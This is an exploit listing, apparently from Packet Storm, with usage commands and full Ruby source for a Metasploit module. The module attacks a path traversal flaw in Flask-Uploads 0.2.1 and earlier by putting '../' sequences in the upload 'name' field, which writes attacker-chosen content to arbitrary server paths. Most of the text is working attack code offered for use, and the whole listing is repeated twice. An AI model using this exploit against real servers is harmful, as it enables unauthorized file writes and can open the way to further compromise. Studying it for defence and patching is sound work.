Description
Flask-Uploads versions 0.2.1 and below Metasploit module that exploits a path traversal vulnerability to achieve an arbitrary file write...
Basic Information
ID
PACKETSTORM:214818
Published
Feb 3, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : Flask-Uploads <= 0.2.1 Path Traversal to Arbitrary File Write |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://github.com/maxcountryman/flask-uploads |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214228/
[+] Summary : This Metasploit module exploits a path traversal vulnerability in the Flask-Uploads library versions 0.2.1 and earlier.
The issue stems from insufficient sanitization of the name parameter used in the save() method of the UploadSet class,
allowing an attacker to traverse directories and write arbitrary files outside the intended upload directory.
The module is designed strictly to demonstrate arbitrary file write capability and does not assume or attempt remote code execution.
File execution depends entirely on application logic, server configuration, and file placement, which are intentionally left out of scope.
Successful exploitation may result in unauthorized file creation on the target filesystem,
potentially enabling further attacks when chained with additional vulnerabilities.
[+] Usage :
use exploit/multi/http/flask_uploads_traversal
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set TARGETURI /upload
exploit
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Flask-Uploads <= 0.2.1 Path Traversal Arbitrary File Write',
'Description' => %q{
This module exploits a path traversal vulnerability in the Flask-Uploads
library (version 0.2.1 and prior). The vulnerability allows for arbitrary
file writes outside of the intended upload directory by manipulating the
'name' parameter passed to the save() function. This module focuses on
the file write primitive.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://github.com/maxcountryman/flask-uploads/issues/43']
],
'Privileged' => false,
'Platform' => %w[linux win unix],
'Arch' => ARCH_ALL,
'Targets' => [['Generic Arbitrary File Write', {}]],
'DisclosureDate' => '2024-10-25',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [], # No session guaranteed
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'The vulnerable endpoint URL', '/upload']),
OptString.new('FIELD_NAME', [true, 'The multipart field name for the file upload', 'files']),
OptString.new('TRAVERSAL_DEPTH', [true, 'Depth of path traversal to reach root', '10']),
OptString.new('REMOTE_PATH', [true, 'The target path on the remote system', '/tmp/pwned.txt']),
OptString.new('FILE_CONTENT', [true, 'Content to write to the remote file', 'Vulnerability Confirmed'])
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
return CheckCode::Unknown('No response from the target.') unless res
if res.code == 200
return CheckCode::Detected("Endpoint #{target_uri.path} is reachable.")
end
CheckCode::Safe
end
def exploit
traversal = "../" * datastore['TRAVERSAL_DEPTH'].to_i
remote_filename = datastore['REMOTE_PATH'].sub(%r{^/}, '')
malicious_name = "#{traversal}#{remote_filename}"
data = Rex::MIME::Message.new
data.add_part(
datastore['FILE_CONTENT'],
'text/plain',
nil,
"form-data; name=\"#{datastore['FIELD_NAME']}\"; filename=\"test.txt\""
)
data.add_part(malicious_name, nil, nil, "form-data; name=\"name\"")
print_status("Attempting to write #{datastore['FILE_CONTENT'].length} bytes to #{datastore['REMOTE_PATH']}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if res && res.code == 200
print_good("Server responded with 200 OK. Verification required at: #{datastore['REMOTE_PATH']}")
else
status = res ? res.code : 'no response'
fail_with(Failure::UnexpectedReply, "Server responded with #{status}. Exploitation failed.")
end
end
end
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================
| # Title : Flask-Uploads <= 0.2.1 Path Traversal to Arbitrary File Write |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://github.com/maxcountryman/flask-uploads |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214228/
[+] Summary : This Metasploit module exploits a path traversal vulnerability in the Flask-Uploads library versions 0.2.1 and earlier.
The issue stems from insufficient sanitization of the name parameter used in the save() method of the UploadSet class,
allowing an attacker to traverse directories and write arbitrary files outside the intended upload directory.
The module is designed strictly to demonstrate arbitrary file write capability and does not assume or attempt remote code execution.
File execution depends entirely on application logic, server configuration, and file placement, which are intentionally left out of scope.
Successful exploitation may result in unauthorized file creation on the target filesystem,
potentially enabling further attacks when chained with additional vulnerabilities.
[+] Usage :
use exploit/multi/http/flask_uploads_traversal
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set TARGETURI /upload
exploit
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Flask-Uploads <= 0.2.1 Path Traversal Arbitrary File Write',
'Description' => %q{
This module exploits a path traversal vulnerability in the Flask-Uploads
library (version 0.2.1 and prior). The vulnerability allows for arbitrary
file writes outside of the intended upload directory by manipulating the
'name' parameter passed to the save() function. This module focuses on
the file write primitive.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://github.com/maxcountryman/flask-uploads/issues/43']
],
'Privileged' => false,
'Platform' => %w[linux win unix],
'Arch' => ARCH_ALL,
'Targets' => [['Generic Arbitrary File Write', {}]],
'DisclosureDate' => '2024-10-25',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [], # No session guaranteed
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'The vulnerable endpoint URL', '/upload']),
OptString.new('FIELD_NAME', [true, 'The multipart field name for the file upload', 'files']),
OptString.new('TRAVERSAL_DEPTH', [true, 'Depth of path traversal to reach root', '10']),
OptString.new('REMOTE_PATH', [true, 'The target path on the remote system', '/tmp/pwned.txt']),
OptString.new('FILE_CONTENT', [true, 'Content to write to the remote file', 'Vulnerability Confirmed'])
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
return CheckCode::Unknown('No response from the target.') unless res
if res.code == 200
return CheckCode::Detected("Endpoint #{target_uri.path} is reachable.")
end
CheckCode::Safe
end
def exploit
traversal = "../" * datastore['TRAVERSAL_DEPTH'].to_i
remote_filename = datastore['REMOTE_PATH'].sub(%r{^/}, '')
malicious_name = "#{traversal}#{remote_filename}"
data = Rex::MIME::Message.new
data.add_part(
datastore['FILE_CONTENT'],
'text/plain',
nil,
"form-data; name=\"#{datastore['FIELD_NAME']}\"; filename=\"test.txt\""
)
data.add_part(malicious_name, nil, nil, "form-data; name=\"name\"")
print_status("Attempting to write #{datastore['FILE_CONTENT'].length} bytes to #{datastore['REMOTE_PATH']}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if res && res.code == 200
print_good("Server responded with 200 OK. Verification required at: #{datastore['REMOTE_PATH']}")
else
status = res ? res.code : 'no response'
fail_with(Failure::UnexpectedReply, "Server responded with #{status}. Exploitation failed.")
end
end
end
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================